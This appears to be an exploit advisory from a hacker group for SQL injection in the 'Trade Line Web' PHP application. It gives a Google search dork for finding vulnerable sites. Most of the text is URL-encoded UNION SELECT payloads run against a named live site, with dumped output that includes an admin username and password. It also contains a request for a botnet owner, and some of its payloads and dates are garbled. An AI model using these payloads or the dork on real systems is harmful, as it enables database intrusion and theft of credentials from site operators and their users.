[~] HomePage: http://h4x0resec.blogspot.com-http://1337day.com
Special greetz to: and Endonesian Backtrack Team-0nto. me | 09exploit.com
My inj3ct0r Brothers .:)
R0073r (~) Sid3 ^ effectS (~) R4dc0re (~) Indoushka (~) EXeSoul (~) Eidelweiss (~) SeeMe (~)
XroGuE (~) Agix (~) KedAns-Dz (~) Gunslinger _(~) Sn! PEr. S! Te (~) ZoRLu (~) AnT! -Tr0J4n
--------------------------------------------------------
Note: I Need botnet Owner friend!
~~~~~~~~~~~~~~~~ [Software info] ~~~~~~~~~~~~~~~~~~~~~~~
| ~ Web App.: Trade Line Web
| ~ Price: N/
| ~ Version: N/
| ~ Software: http://www.tradelineweb.com/
| ~ Vulnerability Style: SQL INJECTION
| ~ Vulnerability Dir :/
| ~ Google Keyword: "Trade Line Web" inurl: detay. php
| [~] Date: "192.165.2011"
| [~] Tested on:
DEMOS
----------------------------------------------------------
Urunler. php <= ID Functions Not Security
Detay. php <= ID Functions Not Security
---------------------------------------------------------
Example | Exploitation
SQL Injecting ..
Target: http://www.bkjia.com/detay.php? Id =-288% 20and % 201 = 1% 20 union % 20 select % ,,2, group_concat % 28column_name % 29,4, 5, 6, 9, 10, 11% 20 from % 20information_schema.columns % 20 where % 20table_name = 0x7573657273 & tur = urun
Mysql Writes: id, username, password, domain, email, adres, tel1, tel2, tel3, style, hakkimizda, logo, site_baslik, slogan, id, username, password,
Domain, email, adres, tel1, tel2, tel3, style, hakkimizda, logo, site_baslik, slogan, id, username, password, domain, email, adres, tel1,
Tel2, tel3, style, hakkimizda, logo, site_baslik, slogan, id, username, password, domain, email, adres, tel1, tel2, tel3, style,
Hakkimizda, logo, site_baslik, slogan, id, username, password, domain, email, adres, tel1, tel2, tel3, style, hakkimizda, logo,
Site_baslik, slogan
Hm... OK.
SQL Injecting ..
Target: http://www.bkjia.com/urunler.php? Kat_id = 8% 20and % 201 = 1% 20 union % 20 select % 201, group_concat % 28id, 0x3a, username, 0x3a, password % 29,3, 6, 7, 8, 9, 10, 11% 20 from % 20 users % 20 where % 20id = 1
Mysql Writes: 1: admin: 12345
Hmm... OK.
SQL Injecting ..
Target: http://www.bkjia.com/detay.php? Id =-288% 20and % 201 = 1% 20 union % 20 select % ,,2, @ version, 10, 11% 20 from % 20 users % 20 where % 20id = 1 & tur = urun
Mysql Writes: 5.0.90